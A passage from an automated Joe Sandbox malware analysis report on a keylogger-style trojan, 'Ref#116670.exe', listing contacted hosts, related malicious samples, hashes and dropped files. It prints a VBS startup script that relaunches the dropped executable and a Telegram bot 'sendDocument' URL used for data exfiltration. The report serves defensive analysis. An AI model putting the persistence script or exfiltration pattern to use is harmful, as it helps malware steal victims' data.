                                                                    https://stackoverflow.com/q/2152978/23354Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                      high
                                                                      https://reallyfreegeoip.org/xml/8.46.123.228lInstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://checkip.dyndns.org/qRef#116670.exe, 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3283656497.0000000000413000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.ssl.com/repository0Ref#116670.exe, vdvfyt.exe.0.drfalse
                                                                            high
                                                                            http://ocsps.ssl.com0_Ref#116670.exe, vdvfyt.exe.0.drfalse
                                                                              high
                                                                              http://reallyfreegeoip.orgInstallUtil.exe, 00000003.00000002.3287082945.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.000000000293D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://checkip.dyndns.orgdInstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://reallyfreegeoip.orgInstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://checkip.dyndns.comInstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://checkip.dyndns.org/dInstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRef#116670.exe, 00000000.00000002.2250767887.0000000002681000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287082945.0000000002D93000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2498291909.0000000002951000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0Ref#116670.exe, vdvfyt.exe.0.drfalse
                                                                                            high
                                                                                            https://api.telegram.org/bot-/sendDocument?chat_id=Ref#116670.exe, 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3283656497.0000000000413000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://reallyfreegeoip.org/xml/Ref#116670.exe, 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3283656497.0000000000413000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs
                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                194.15.112.248
                                                                                                oshi.atUkraine
                                                                                                213354INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGBfalse
                                                                                                172.67.177.134
                                                                                                reallyfreegeoip.orgUnited States
                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                132.226.247.73
                                                                                                checkip.dyndns.comUnited States
                                                                                                16989UTMEMUSfalse
                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                Analysis ID:1567428
                                                                                                Start date and time:2024-12-03 15:19:19 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 8m 22s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:8
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:Ref#116670.exe
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 100%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 93%
                                                                                                • Number of executed functions: 351
                                                                                                • Number of non-executed functions: 39
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .exe
                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                • VT rate limit hit for: Ref#116670.exe
                                                                                                TimeTypeDescription
                                                                                                09:20:11API Interceptor81x Sleep call for process: Ref#116670.exe modified
                                                                                                09:20:41API Interceptor44x Sleep call for process: vdvfyt.exe modified
                                                                                                15:20:32AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                194.15.112.248Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                    KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                      Order._1.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                                                                                        uVQLD8YVk6.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                                                          W73PCbSH71.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                                                            172.67.177.134Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              #U00d6denmeyen Kredi Taksit Bilgileriniz.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            #U00dcR#U00dcNLER 65Ve20_ B#U00fcy#U00fck mokapto Sipari#U015fi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                              swift.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                132.226.247.73IBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • checkip.dyndns.org/
                                                                                                                                NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • checkip.dyndns.org/
                                                                                                                                P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • checkip.dyndns.org/
                                                                                                                                HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • checkip.dyndns.org/
                                                                                                                                tA5DvuNwfQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • checkip.dyndns.org/
                                                                                                                                Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                • checkip.dyndns.org/
                                                                                                                                021337ISOGENERAL.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • checkip.dyndns.org/
                                                                                                                                PO80330293.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                • checkip.dyndns.org/
                                                                                                                                RYSUNEK_.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • checkip.dyndns.org/
                                                                                                                                MICROCHIP QFP3 22 - 25000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • checkip.dyndns.org/
                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                checkip.dyndns.comIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 132.226.247.73
                                                                                                                                Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 132.226.8.169
                                                                                                                                NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 193.122.130.0
                                                                                                                                #U00d6denmeyen Kredi Taksit Bilgileriniz.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                • 193.122.130.0
                                                                                                                                kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 158.101.44.242
                                                                                                                                Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 193.122.130.0
                                                                                                                                P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 132.226.247.73
                                                                                                                                678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 132.226.8.169
                                                                                                                                HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 132.226.247.73
                                                                                                                                QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 158.101.44.242
                                                                                                                                oshi.atRef#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                Ref#1550238.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 5.253.86.15
                                                                                                                                Swift Payment MT103.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                • 188.241.120.6
                                                                                                                                Facturation.exeGet hashmaliciousDoeneriumBrowse
                                                                                                                                • 188.241.120.6
                                                                                                                                Facturation.exeGet hashmaliciousDoeneriumBrowse
                                                                                                                                • 188.241.120.6
                                                                                                                                KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                JuneOrder.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                                                                                                                • 5.253.86.15
                                                                                                                                Order._1.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                jdconstructnOrderfdp..exeGet hashmaliciousBabadeda, PureLog Stealer, Quasar, zgRATBrowse
                                                                                                                                • 188.241.120.6
                                                                                                                                reallyfreegeoip.orgIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                #U00d6denmeyen Kredi Taksit Bilgileriniz.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGBRef#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                Order._1.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                uVQLD8YVk6.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                W73PCbSH71.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                1pXdiCesZ6.exeGet hashmaliciousDanaBotBrowse
                                                                                                                                • 194.15.112.203
                                                                                                                                bad.pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 194.15.113.200
                                                                                                                                FromRussiaWithLove.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                • 194.15.112.70
                                                                                                                                x.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 194.15.113.210
                                                                                                                                CLOUDFLARENETUSIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 104.26.13.205
                                                                                                                                uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 188.114.96.6
                                                                                                                                BuMdSP88Ze.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 104.26.13.205
                                                                                                                                uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.194.230
                                                                                                                                SANTANDER%20AUDITORIA.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 104.26.13.205
                                                                                                                                uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 188.114.97.6
                                                                                                                                2112024_RS_GIBANJ -SWIFT.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.194.230
                                                                                                                                Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 172.67.201.49
                                                                                                                                2112024_RS_GIBANJ -SWIFT.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                • 188.114.97.6
                                                                                                                                UTMEMUSIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 132.226.247.73
                                                                                                                                Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 132.226.8.169
                                                                                                                                NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 132.226.247.73
                                                                                                                                P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 132.226.247.73
                                                                                                                                678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 132.226.8.169
                                                                                                                                HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 132.226.247.73
                                                                                                                                Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                • 132.226.8.169
                                                                                                                                tA5DvuNwfQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 132.226.247.73
                                                                                                                                Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                • 132.226.247.73
                                                                                                                                Gastroptosis (5).exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                • 132.226.8.169
                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                54328bd36c14bd82ddaa0c04b25ed9adIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                #U00d6denmeyen Kredi Taksit Bilgileriniz.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0eIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                BuMdSP88Ze.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                RFQ 9-XTC-204-60THD.xlsx.exeGet hashmaliciousQuasarBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                SANTANDER%20AUDITORIA.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                Ref#1550238.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                Bestellung - 021224 - 901003637.exeGet hashmaliciousQuasarBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                No context
                                                                                                                                Process:C:\Users\user\Desktop\Ref#116670.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):82
                                                                                                                                Entropy (8bit):4.857433335219371
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:FER/n0eFHHoUkh4EaKC5NkOAHn:FER/lFHI9aZ5WOO
                                                                                                                                MD5:278A3D41EC90C67BD2AEC0C23113F882
                                                                                                                                SHA1:07244A9A01574BD05380E919CEE57189F6CDEA43
                                                                                                                                SHA-256:79CFBE2DE71D82949C83E56CB2D0BCEF4AAA4797C1129E94EE76DF9866840DFD
                                                                                                                                SHA-512:B81E0DF8253AF105CF47853C99C76715EB69B6F39ADDF87711290AECFA2BB48CFFF53F6CBFE02565E301F52D05AE1B608669DF69F4F974FFDA2000AF55A4C30B
                                                                                                                                Malicious:true
                                                                                                                                Reputation:low
                                                                                                                                Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\vdvfyt.exe"""
                                                                                                                                Process:C:\Users\user\Desktop\Ref#116670.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):347104
                                                                                                                                Entropy (8bit):5.700437152022766
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:X9er2G/ROGPIC8VM/+44e2Pb4w45Q97d3O6M:XRdo/+44e2Pb4N5Q97dE
                                                                                                                                MD5:9D61B7E79D1B236CEA4327B484A3D53F
                                                                                                                                SHA1:1DF1FFDA46B2710FBE2D415A508AFD609D6723A4
                                                                                                                                SHA-256:2C3A0CBF5B82B051C9D3DB1307F68DB266EBA44352A8F750E5553DBC58B5CF91
                                                                                                                                SHA-512:FF5613A3A2B9DBE15CD228B0F87728AB973CB95966D49B727EF7E3DE52182973DFBD0C407910AB7BB80196335BD1CE16E8C0E0FA4516AA549A9B27A1EE41A0A8
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                Reputation:low
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g+Ng.............................9... ...@....@.. ....................................`.................................@9..K....@..(....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...(....@......................@..@.reloc.......`.......,..............@..B................p9......H........I..........#....)...............................................*...(....*..0..?..........(.... ....~....{,...:....& ....8....8........E........8....*..0...........(.....(.... ....~....{....:....& ....8....8........E....9.......84....o....~....(....9/... ....~....{ ...:....& ....8.... ..#W(....s....z*..0............o....(.....(.... ....~....{....9....& ....8....8........E........:.......8.... }.#W(....s....z*8.... ....~....{....9....& ....8.....o....~....(....:.... .
                                                                                                                                Process:C:\Users\user\Desktop\Ref#116670.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):26
                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                Malicious:true
                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Entropy (8bit):5.700437152022766
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:Ref#116670.exe
                                                                                                                                File size:347'104 bytes
                                                                                                                                MD5:9d61b7e79d1b236cea4327b484a3d53f
                                                                                                                                SHA1:1df1ffda46b2710fbe2d415a508afd609d6723a4
                                                                                                                                SHA256:2c3a0cbf5b82b051c9d3db1307f68db266eba44352a8f750e5553dbc58b5cf91
                                                                                                                                SHA512:ff5613a3a2b9dbe15cd228b0f87728ab973cb95966d49b727ef7e3de52182973dfbd0c407910ab7bb80196335bd1ce16e8c0e0fa4516aa549a9b27a1ee41a0a8
                                                                                                                                SSDEEP:6144:X9er2G/ROGPIC8VM/+44e2Pb4w45Q97d3O6M:XRdo/+44e2Pb4N5Q97dE
                                                                                                                                TLSH:0F747107F7C1D4D6CE507772F4971A01B3A0FCC06A8FDE0A6A5673D80973BA669C618A
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g+Ng.............................9... ...@....@.. ....................................`................................
                                                                                                                                Icon Hash:b04a484c4c4a4eb0
                                                                                                                                Entrypoint:0x44398e
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:true
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x674E2B67 [Mon Dec 2 21:49:27 2024 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:4
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:4
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:4
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                Signature Valid:false
                                                                                                                                Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                Error Number:-2146869232
                                                                                                                                Not Before, Not After
                                                                                                                                • 04/07/2024 00:35:32 15/05/2027 11:15:04
                                                                                                                                Subject Chain
